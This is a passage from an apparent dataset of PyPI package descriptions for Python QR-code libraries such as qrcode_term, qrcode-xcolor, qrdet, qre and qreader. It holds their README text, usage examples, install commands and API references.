\u2580\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\nmydata\n\n> python src/qrcode_term/qrcode_term.py --data \"mydata 2\" -f3 -i\n \n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584 \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \n \u2588 \u2584\u2584\u2584 \u2588 \u2588\u2588\u2580\u2588\u2580 \u2588 \u2584\u2584\u2584 \u2588 \n \u2588 \u2588\u2588\u2588 \u2588 \u2584\u2580\u2580\u2580\u2584 \u2588 \u2588\u2588\u2588 \u2588 \n \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2584 \u2584\u2580\u2588 \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \n \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2588\u2580\u2588\u2584 \u2584 \u2584\u2584\u2584 \n \u2580\u2584\u2584\u2588\u2580\u2584 \u2584\u2580\u2588 \u2580 \u2580\u2588 \u2584\u2588\u2584 \n \u2580\u2584\u2584 \u2580\u2580\u2584\u2584\u2584\u2580 \u2580 \u2584\u2584\u2584\u2588\u2584\u2580\u2580 \n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2588 \u2580\u2588\u2584\u2584\u2584\u2588\u2580\u2588\u2580 \n \u2588 \u2584\u2584\u2584 \u2588 \u2588\u2588\u2580\u2588\u2588\u2580\u2584\u2588\u2580\u2588\u2580 \u2580 \n \u2588 \u2588\u2588\u2588 \u2588 \u2580 \u2588\u2580\u2580 \u2584 \u2584\u2580\u2588\u2584\u2584 \n \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2584\u2580\u2584\u2584 \u2580\u2580 \u2584\u2588\u2580\u2580\u2580 \n \n \nmydata 2\n\n> python src/qrcode_term/qrcode_term.py --data \"mydata 3\" -f10 -n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2584\u2584\u2584\u2584\u2584 \u2588\u2588\u2584 \u2580 \u2588 \u2584\u2584\u2584\u2584\u2584 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588 \u2588 \u2588 \u2584 \u2588\u2580\u2588 \u2588 \u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2584\u2584\u2584\u2588 \u2588 \u2584\u2584 \u2588 \u2588\u2584\u2584\u2584\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588 \u2580\u2584\u2580 \u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2580\u2584 \u2588 \u2588\u2584\u2584 \u2584\u2584\u2580\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584 \u2580 \u2580\u2584\u2580\u2588 \u2584\u2584\u2588\u2584\u2584 \u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2588 \u2588 \u2580\u2580\u2580 \u2580\u2580\u2580\u2584 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2584\u2584\u2584\u2584\u2584 \u2588\u2580\u2584\u2584\u2580 \u2580 \u2584\u2588\u2580 \u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588 \u2588 \u2588 \u2580\u2588\u2588 \u2588\u2588 \u2580\u2588\u2580\u2588\u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2584\u2584\u2584\u2588 \u2588\u2584\u2584\u2584\u2584\u2588\u2584\u2588\u2580\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2584\u2588\u2588\u2584\u2588\u2584\u2588\u2588\u2588\u2584\u2588\u2584\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\nmydata 3APIExamples:from qrcode_term import qrcode_string\n\na = qrcode_string(\"Is there anybody out there?\")\nb = qrcode_string(\"It's just another brick in the wall\", frame_width=1)\nc = qrcode_string(\"Vera! Vera!\", version=5, inverse=True, frame_width=5, ansi_white=False)\n\nprint(a)\nprint(b)\nprint(c)"} +{"package": "qrcode_terminal", "pacakge-description": "No description available on PyPI."} +{"package": "qrcodetools", "pacakge-description": "-test"} +{"package": "qrcodeutil", "pacakge-description": "QR Code Decoder Python LibraryTheQR Code Decoder Python Libraryis a pure Python implementation of QR code decoding.The few existing Python implementations, such asqrtools, actually depends on other libraries (e.g.,Zbar), which your grandmother won't be able to install the same way on Windows, Mac, and Linux, in just one click, for sure. And you should consider most of the users, and even your pairs, like your grandmother.This Python library is not intended to be used for real-time QR code decoding. It takes a few seconds per image."} +{"package": "qrcode-utils", "pacakge-description": "qrcode_utilsEste pacote permite gerar um c\u00f3digo do tipo imagem .png, QR CODE a partir de uma string fornecida pelo usu\u00e1rio, como tamb\u00e9m decodificar o codigo gerado atrav\u00e9s do arquivo de imagem fornecido.Instala\u00e7\u00e3o:pip install qrcode_utilsInstru\u00e7\u00f5es de uso:Primeiramente precisa instalar as bibliotecas e importa a classe Qr do m\u00f3dulo QrUtilitario.Qr\nEm seguida, definir uma palavra (string de at\u00e9 4296 caracteres) como entrada, que ser\u00e1 transformada em QR CODE.\nPara a decodifica\u00e7\u00e3o, a entrada ser\u00e1 um arquivo de imagem do tipo QR CODE, que ser\u00e1 lida e decodificada em string.Requerimentos de bibliotecasPrincipais bibliotecas instaladas para que o pacote execute corretamente.opencv-pythonqrcodenumpyArquivo de testeO arquivo de teste.py (main.py) deve ser configurado da seguinte forma:from QrUtilitario.Qr import Qr\n\npalavra = \"Suco de cevadiss, \u00e9 um leite divinis, qui tem lupuliz, matis, aguis e fermentis\"\n\ndado = Qr.gerar_qr(palavra)\n\nQr.ler_imagem(\"meu_qr_code.png\")"} +{"package": "qrcode-xcolor", "pacakge-description": "QRCode XColorNote: This does not work with the qrcode version 7.3.1 in pypi. pypi will not allow git sources in the setup.py requirments so mush be manually installedInstall qrcode from master branchpipinstallgit+https://github.com/lincolnloop/python-qrcode.git@8a37658d68dae463479ee88e96ee3f1f53a16f54This library recreates a few of themoduledrawersclasses already found inhttps://github.com/lincolnloop/python-qrcode.This was done to greatly speed up the generation of creating colored qrcodes, as well as supporting for different colors and styles for the location marker in the corners.Using these custom classes you do lose support for the full features of thecolor_maskargument in the originalQRCodelibrary like having the colors be a gradient across the qrcode.I chose for speed over having that feature with still getting full color and transparency support of the qrcode.All supported module drawers:fromqrcode_xcolorimport(XStyledPilImage,XSquareModuleDrawer,XGappedSquareModuleDrawer,XCircleModuleDrawer,XRoundedModuleDrawer,XVerticalBarsDrawer,XHorizontalBarsDrawer)Here are some examples of the speed difference:importtimeimportqrcodefromqrcode.image.styledpilimportStyledPilImagefromqrcode.image.styles.moduledrawersimportGappedSquareModuleDrawer,RoundedModuleDrawerfromqrcode.image.styles.colormasksimportSolidFillColorMaskfromqrcode_xcolorimportXStyledPilImage,XGappedSquareModuleDrawer,XRoundedModuleDrawerst=time.time()qr=qrcode.QRCode()qr.add_data(\"https://example.com\")img=qr.make_image(image_factory=StyledPilImage,color_mask=SolidFillColorMask(front_color=(59,89,152),back_color=(255,255,255),),module_drawer=GappedSquareModuleDrawer(),eye_drawer=RoundedModuleDrawer(),embeded_image_path='docs/gitlab.png',)img.save(\"qrcode_color_mask.png\")print(f\"qrcode color_mask:{time.time()-st:.4f}s\")st=time.time()qr=qrcode.QRCode()qr.add_data(\"https://example.com\")# The 4th value in all the colors is the opacity the color should use (0=clear <--> 255=solid)img=qr.make_image(# Custom image factoryimage_factory=XStyledPilImage,back_color=(255,255,255,255),# Background color with opacity supportmodule_drawer=XGappedSquareModuleDrawer(front_color=(59,89,152,255),),eye_drawer=XRoundedModuleDrawer(front_color=(255,110,0,255),inner_eye_color=(65,14,158,255),# Only valid with the eye_drawer),embeded_image_path='docs/gitlab.png',# Still supports embedding logos in the middle)img.save(\"qrcode-xcolor.png\")print(f\"qrcode-xcolor:{time.time()-st:.4f}s\")From this test we get the results (exact timings will vary but the difference is always there):qrcode color_mask: 0.5071sqrcode-xcolor: 0.0430s"} +{"package": "qrconfig", "pacakge-description": "qrconfigCan access dictionary items both as dictionary (like config['field']) and as an attribute (config.field),\nrecursively: config.field.subfield.subsubfield...\nAlso supports item assignment to update the configuration in runtime.Usage example:fromqrconfigimportQRYamlConfigconfig=QRYamlConfig('config.yaml')a=config.ab=config['b']config.a=4"} +{"package": "qrconsole", "pacakge-description": "QRConsoleA library to display QR codes in console.RequirementsPillow>=7.0.0- Download usingpythonorpython3 -m pip install \"Pillow>=7.0.0\"InstallationPyPITo get the module through PyPi:pip install qrconsole.GitHub (Pulled Repo)To install the module by pulling the repo:python setup.py install.How to useQRConsole is pretty straight-forward. Provide an image, and it will return a string with the console-ified version.The image provided must be black-and-white. If there are greys, they will be turned into white or black depending on which they are closer to.A good site for creation isthis one, since there is no rounding or styling, just b&w pixels.It is recommended to keep the images as small as possible, since every pixel of the image is two characters in the console. The example image is 65x65 px.UseIn a projectInitializefromqrconsoleimportQRConsoleqr=QRConsole(char=\"@\")# char = The character to use for white in the QR Code. Must have a length of 1.Console-ify imageThere are two ways to do this. The first way is to provide a path to the image:print(qr.consoleify(qr_img=\"path_to_code.png\",resize_factor=1))# `qr_img: str` - The path to the QR Code image.# `resize_factor: float` - How much to shrink/grow the image by (`width/resize_factor`, `height/resize_factor`)And the second way is to provide a Pillow Image object:fromPILimportImageimg=Image.open(\"path_to_code.png\")print(qr.consoleify(qr_img=img,resize_factor=1))# `qr_img: Image` - A Pillow Image object.# `resize_factor: float` - How much to shrink/grow the image by (`width/resize_factor`, `height/resize_factor`)Some libraries (for example theqrcodelibrary) can turn codes into Images natively, so this method would be easier to use to avoid unnecessary file-writing.Throughpython -mIt is also possible to use QRConsole as a command line tool. After installing the package, runpythonorpython3 -m qrconsole ."} +{"package": "qr-console", "pacakge-description": "qr_consoleThis project is a small console-app builder based onargparsepackage.Usage example:fromqr_consoleimportQRConsole,QRCommandconsole=QRConsole(hello='hello')console.add_command(QRCommand('add',lambdaa,b:print(a+b),'sum 2 integers').add_argument('a',type=int,help='1st arg').add_argument('b',type=int,help='2nd arg'))console.add_command(QRCommand('sub',lambdaa,b:print(a-b),'differ 2 integers').add_argument('-a',type=int,default=0,help='1st arg').add_argument('--value','-v',type=int,help='2nd arg'))console.add_command(QRCommand('one',lambdav,i:print(v+1ifielsev-1),'change value by 1').add_argument('v',type=int).add_argument('-i','--flag',action='store_true',help='set to inc; default is dec'))console.run()Output example:hello\nType'-h'or'--help'togetmoreinfo\nEntercommands:\n?>-h\nusage:PROG[-h]{add,sub,one}...\n\npositionalarguments:{add,sub,one}addsum2integerssubdiffer2integersonechangevalueby1optionalarguments:-h,--helpshowthishelpmessageandexit?>add-h\nusage:add[-h]ab\n\npositionalarguments:a1stargb2ndarg\n\noptionalarguments:-h,--helpshowthishelpmessageandexit?>one--help\nusage:one[-h][-i]v\n\npositionalarguments:v\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-i,--i,--flagsettoinc;defaultisdec\n?>add123?>sub-a=5-v=23?>sub--value=5-5\n?>one54?>one-i56?>add\nthefollowingargumentsarerequired:a,b\n?>sub-b=5unrecognizedarguments:-b=5?>add1a\nargumentb:invalidintvalue:'a'?>"} +{"package": "qrc-pathlib", "pacakge-description": "qrc_pathlibQt Resource Systemallows to store files\ninside binaries and read them by using Qt\u2019s file system abstraction (QFile, QDir etc).This package extendspathlibintroduced in Python 3.4\nby implementingPathandPurePathfor QRS:fromqrc_pathlibimportQrcPathQrcPath(':my_resource.svg').read_bytes()withQrcPath(':hello.txt').open()asf:print(f.read())Since QRS is read-only all methods that are supposed to modify files raisePermissionError. Other inapplicable methods\nsuch asstatwill raiseNotImplementedError."} +{"package": "qrdecode", "pacakge-description": "decode QRCode data"} +{"package": "qrdecoder", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrdecodexy", "pacakge-description": "Get constellation Info From juhe API"} +{"package": "qrdet", "pacakge-description": "QRDetQRDetis a robustQR Detectorbased onYOLOv8.QRDetwill detect & segmentQRcodes even indifficultpositions ortrickyimages. If you are looking for a completeQR Detection+Decodingpipeline, take a look atQReader.InstallationTo installQRDet, simply run:pipinstallqrdetUsageThere is only one function you'll need to call to useQRDet,detect:fromqrdetimportQRDetectorimportcv2detector=QRDetector(model_size='s')image=cv2.imread(filename='resources/qreader_test_image.jpeg')detections=detector.detect(image=image,is_bgr=True)# Draw the detectionsfordetectionindetections:x1,y1,x2,y2=detections['bbox_xyxy']confidence=detections['confidence']segmenation_xy=detections['quadrilateral_xy']cv2.rectangle(image,(x1,y1),(x2,y2),color=(0,255,0),thickness=2)cv2.putText(image,f'{confidence:.2f}',(x1,y1-10),fontFace=cv2.FONT_HERSHEY_SIMPLEX,fontScale=1,color=(0,255,0),thickness=2)# Save the resultscv2.imwrite(filename='resources/qreader_test_image_detections.jpeg',img=image)API ReferenceQReader.detect(image, is_bgr = False, **kwargs)image:np.ndarray|'PIL.Image'|'torch.Tensor'|str.np.ndarrayof shape(H, W, 3),PIL.Image,Tensorof shape(1, 3, H, W), orpath/urlto the image to predict.'screen'for grabbing a screenshot.is_bgr:bool. IfTruethe image is expected to be inBGR. Otherwise, it will be expected to beRGB. Only used when image isnp.ndarrayortorch.tensor. Default:Falselegacy:bool. If sent askwarg, will parse the output to make it identical to 1.x versions. Not Recommended. Default: False.Returns:tuple[dict[str, np.ndarray|float|tuple[float|int, float|int]]]. A tuple of dictionaries containing all the information of every detection. Contains the following keys.KeyValue Desc.Value TypeValue FormconfidenceDetection confidencefloatconf.bbox_xyxyBounding boxnp.ndarray (4)[x1, y1, x2, y2]cxcyCenter of bounding boxtuple[float,float](x, y)whBounding box width and heighttuple[float,float](w, h)polygon_xyPrecise polygon that segments theQRnp.ndarray (N,2)[[x1, y1], [x2, y2], ...]quad_xyFour corners polygon that segments theQRnp.ndarray (4,2)[[x1, y1], ..., [x4, y4]]padded_quad_xyquad_xypadded to fully coverpolygon_xynp.ndarray (4,2)[[x1, y1], ..., [x4, y4]]image_shapeShape of the input imagetuple[float,float](h, w)NOTE:Allnp.ndarrayvalues are of typenp.float32All keys (exceptconfidenceandimage_shape) have a normalized ('n') version. For example,bbox_xyxyrepresents the bbox of the QR in image coordinates [[0., im_w], [0., im_h]], whilebbox_xyxyncontains the same bounding box in normalized coordinates [0., 1.].bbox_xyxy[n]andpolygon_xy[n]are clipped toimage_shape. You can use them for indexing without further managementAcknowledgementsThis library is based on the following projects:YoloV8model forObject Segmentation.QuadrilateralFitterfor fitting 4 corners polygons from noisysegmentation outputs."} +{"package": "qrDocumentIndexer", "pacakge-description": "qrDocumentIndexerA python library for tagging PDF documents with QR codes so that they can be rebuilt into the same document structure after being printed and scanned back.PurposeThis library is intended to be used where documents may be printed and then subsequently scanned back to digital format. Normally\nthis process would result in the loss of any format structure. The documents may even be scanned back in different orders. This\ncan be particularly common in the cases where documents being printed are technical drawings and they may be re-ordered for\nreview or other purposes before being scanned again.This library is intended to store the following information about each page of a PDF in a QR code:FilenamePage numberBookmarks (including nesting)This information can then be used to restructure the documents after scanning. This should even be possible if documents\nare scanned into multiple PDFs or image files.Additional metadata that could be included in future could include:PagesizesPaper orientationCurrent StateThe tool in it's current state should be fully functional. It can:Insert QR codes into each page of provided PDFs to allow later sorting;Scan PDFs or image files for QR codes to determine their appropriate order in a document;Reconstitute PDF files based on the order dictated by detected QR codes, recreating the original filenames and orders of the documents.What is missing:There is currently no progress indication. It will finish when it finishes;Currently the QR scanning process is single threaded so it may take some time to complete;There is no preview for the documents so you will have to run the tool for everything to see what you get.How to installInstall with the following command:pip install qrDocumentIndexerZBarThis package relies on the ZBar library. Please see the below guides for ensuring this library is properly installed:OnWindows:No installation is required as it is packaged with the python libraries, but it does have dependancies which if not present can cause errors:If you see an ugly ImportError related withlizbar-64.dll, install thevcredist_x64.exefrom theVisual C++ Redistributable Packages for Visual Studio 2013OnLinux:sudoapt-getinstalllibzbar0OnMac OS X:brewinstallzbar"} +{"package": "qre", "pacakge-description": "qre - like re, but cuterSamplesPattern\"* pattern\"Input\"First pattern\"Result\ud83d\udc4d\ud83c\udffcPattern\"World's [] pattern\"Input\"World's coolest pattern\"Result[\"coolest\"]Pattern\"product id: [product_id], units: [units: int], price: [unit_price: decimal]\"Input\"Product ID: A123, Units: 3, Price: 1.23\"(case-insensitive)Result{\"product_id\": \"A123\", \"units\": 3, \"unit_price\": Decimal(\"1.23\")}This package owes everything, including most of the codebase, to Thomas Feldtmann'ssimplematch. All poor design decisions are mine.\nSeethis collectionfor other alternatives.Status: Comprehensively tested but never used for anything real. All evolution is expected to be\nincremental.Quick startpip install qreMy first little match:importqreassertqre.search(\"in [place]\",\"Match made in heaven\")=={\"place\":\"heaven\"}qreis mostly focused on collecting named groups from the input strings, so the return value is\nan easy-to-access dict. Groups are denoted with brackets, which means that patterns are friendly\nwith f-strings.For unnamed groups the returned object has been tweaked a little bit - they can be found as a list\nin theunnamedattribute:assertqre.match(\"[] [:int]\",\"Lesson 1\").unnamed==[\"Lesson\",1]Type specifiers can be used with both named and unnamed groups. They act both as specs for the\npattern to find and, when applicable, as converters to the right type.Currently available types are:intfloatdecimaldate(ISO)datetime(ISO)uuidlettersidentifier(lettersplus numbers and underscore)emailurlipv4ipv6creditcardopen(any one of(,[,{)close(),], or})You can register your own types and conversions withregister_type(name, regex, converter=str).\nAsqre's goal is not to replicate the functionality of re, this can also act as the \"escape hatch\"\nwhen you need just a little bit more than whatqreoffers.Here's how to useregister_typeto turn an emoji into a textual description:qre.register_type(\"mood\",r\"[\ud83d\ude00\ud83d\ude1e]\",lambdaemoji:{\"\ud83d\ude00\":\"good\",\"\ud83d\ude1e\":\"bad\"}.get(emoji,\"unknown\"))assertqre.search(\"[mood:mood]\",\"I'm feeling \ud83d\ude00 today!\")=={\"mood\":\"good\"}Note thatregister_typemanipulates a global object, so you only need to register custom types\nonce, probably somewhere towards the start of your program.PRs for generally useful types are highly welcome.Matching functionsMatching functions expect apatternand astringto match against. The optionalcase_sensitiveargument is true by default.match- Matchpatternagainst the whole of thestringmatch_start- Matchpatternagainst the beginning of thestringmatch_end- Matchpatternagainst the end of thestringsearch- Return the first match of thepatternin thestringsearch_all- Return all matches of thepatternin thestringas a listAll of the functions always return an object that is either truthy or falsy depending on whether\nthere was a match or not. They never returnNone, and theunnamedattribute contains at least an\nempty list, so the returned object is always safe to iterate.Alternatively, you can use the Matcher object. It has the following useful attributes:regexfor debugging the generated regex, or for copying it for use with plainreconvertersfor debugging the converters in usematcher=qre.Matcher(\"value: [quantitative:float]|[qualitative]\",case_sensitive=False)assertmatcher.match(\"Value: 1.0\")=={\"quantitative\":1.0}# Or any of the other functions aboveassertmatcher.regex==\"value:\\\\(?P[+-]?(?:[0-9]*[.])?[0-9]+)|(?P.*)\"assertmatcher.converters=={'quantitative':float}As a final usage scenario, you can callqreon the command line:$ python qre.py\nusage: qre.py [-h] [--regex] pattern stringPattern syntax summaryWildcards:*- any character 0+ times+- any 1 character?- any 1 character, maybeOperators:|- either of two characters or groupsGroups:[name]- named group called \"name\", returned in the main dict.[]- unnamed group, returned in theunnamedlist[name:4],[:4]- group that is 4 characters wide[name:int],[:int]- group that matches the type and is converted to that Python typeEscaping:[*],[+],[?],[|]- literal symbol, not wildcard[[,]]- literal brackets, not groups"} +{"package": "qreader", "pacakge-description": "QReaderQReaderis aRobustandStraight-Forwardsolution for readingdifficultandtrickyQRcodes within images inPython. Powered by aYOLOv8model.Behind the scenes, the library is composed by two main building blocks: AYOLOv8QR Detectormodel trained todetectandsegmentQR codes (also offered asstand-alone), and thePyzbarQR Decoder. Using the information extracted from thisQR Detector,QReadertransparently applies, on top ofPyzbar, different image preprocessing techniques that maximize thedecodingrate on difficult images.InstallationTo installQReader, simply run:pipinstallqreaderYou may need to install some additionalpyzbardependencies:OnWindows:Rarely, you can see an ugly ImportError related withlizbar-64.dll. If it happens, install thevcredist_x64.exefrom theVisual C++ Redistributable Packages for Visual Studio 2013OnLinux:sudoapt-getinstalllibzbar0OnMac OS X:brewinstallzbarNOTE:If you're runningQReaderin a server with very limited resources, you may want to install theCPUversion ofPyTorch, before installingQReader. To do so, run:pip install torch --no-cache-dir(Thanks to@cjwaltherfor his advice).UsageQReaderis a very simple and straight-forward library. For most use cases, you'll only need to calldetect_and_decode:fromqreaderimportQReaderimportcv2# Create a QReader instanceqreader=QReader()# Get the image that contains the QR codeimage=cv2.cvtColor(cv2.imread(\"path/to/image.png\"),cv2.COLOR_BGR2RGB)# Use the detect_and_decode function to get the decoded QR datadecoded_text=qreader.detect_and_decode(image=image)detect_and_decodewill return atuplecontaining the decodedstringof everyQRfound in the image.NOTE: Some entries can beNone, it will happen when aQRhave been detected butcouldn't be decoded.API ReferenceQReader(model_size = 's', min_confidence = 0.5, reencode_to = 'shift-jis')This is the main class of the library. Please, try to instantiate it just once to avoid loading the model every time you need to detect aQRcode.model_size:str. The size of the model to use. It can be'n'(nano),'s'(small),'m'(medium) or'l'(large). Larger models are more accurate but slower. Default: 's'.min_confidence:float. The minimum confidence of the QR detection to be considered valid. Values closer to 0.0 can get moreFalse Positives, while values closer to 1.0 can lose difficult QRs. Default (and recommended): 0.5.reencode_to:str|None. The encoding to reencode theutf-8decoded QR string. If None, it won't re-encode. If you find some characters being decoded incorrectly, try to set aCode Pagethat matches your specific charset. Recommendations that have been found useful:'shift-jis' for Germanic languages'cp65001' for Asian languages (Thanks to @nguyen-viet-hung for the suggestion)QReader.detect_and_decode(image, return_detections = False)This method will decode theQRcodes in the given image and return the decodedstrings(orNone, if any of them was detected but not decoded).image:np.ndarray. The image to be read. It is expected to beRGBorBGR(uint8). Format (HxWx3).return_detections:bool. IfTrue, it will return the full detection results together with the decoded QRs. If False, it will return only the decoded content of the QR codes.is_bgr:boolean. IfTrue, the received image is expected to beBGRinstead ofRGB.Returns:tuple[str | None] | tuple[tuple[dict[str, np.ndarray | float | tuple[float | int, float | int]]], str | None]]: A tuple with all detectedQRcodes decodified. Ifreturn_detectionsisFalse, the output will look like:('Decoded QR 1', 'Decoded QR 2', None, 'Decoded QR 4', ...). Ifreturn_detectionsisTrueit will look like:(('Decoded QR 1', {'bbox_xyxy': (x1_1, y1_1, x2_1, y2_1), 'confidence': conf_1}), ('Decoded QR 2', {'bbox_xyxy': (x1_2, y1_2, x2_2, y2_2), 'confidence': conf_2, ...}), ...). LookQReader.detect()for more information about detections format.QReader.detect(image)This method detects theQRcodes in the image and returns atuple of dictionarieswith all the detection information.image:np.ndarray. The image to be read. It is expected to beRGBorBGR(uint8). Format (HxWx3).is_bgr:boolean. IfTrue, the received image is expected to beBGRinstead ofRGB.Returns:tuple[dict[str, np.ndarray|float|tuple[float|int, float|int]]]. A tuple of dictionaries containing all the information of every detection. Contains the following keys.KeyValue Desc.Value TypeValue FormconfidenceDetection confidencefloatconf.bbox_xyxyBounding boxnp.ndarray (4)[x1, y1, x2, y2]cxcyCenter of bounding boxtuple[float,float](x, y)whBounding box width and heighttuple[float,float](w, h)polygon_xyPrecise polygon that segments theQRnp.ndarray (N,2)[[x1, y1], [x2, y2], ...]quad_xyFour corners polygon that segments theQRnp.ndarray (4,2)[[x1, y1], ..., [x4, y4]]padded_quad_xyquad_xypadded to fully coverpolygon_xynp.ndarray (4,2)[[x1, y1], ..., [x4, y4]]image_shapeShape of the input imagetuple[int,int](h, w)NOTE:Allnp.ndarrayvalues are of typenp.float32All keys (exceptconfidenceandimage_shape) have a normalized ('n') version. For example,bbox_xyxyrepresents the bbox of the QR in image coordinates [[0., im_w], [0., im_h]], whilebbox_xyxyncontains the same bounding box in normalized coordinates [0., 1.].bbox_xyxy[n]andpolygon_xy[n]are clipped toimage_shape. You can use them for indexing without further managementNOTE: Is this the only method you will need? Take a look atQRDet.QReader.decode(image, detection_result)This method decodes a singleQRcode on the given image, described by a detection result.Internally, this method will run thepyzbardecoder, using the information of thedetection_result, to apply different image preprocessing techniques that heavily increase the detecoding rate.image:np.ndarray. NumPy Array with theimagethat contains theQRto decode. The image is expected to be inuint8format [HxWxC], RGB.detection_result: dict[str, np.ndarray|float|tuple[float|int, float|int]]. One of thedetection dictsreturned by thedetectmethod. Note thatQReader.detect()returns atupleof thesedict. This method expects just one of them.Returns:str | None. The decoded content of theQRcode orNoneif it couldn't be read.Usage TestsTwo sample images. At left, an image taken with a mobile phone. At right, a 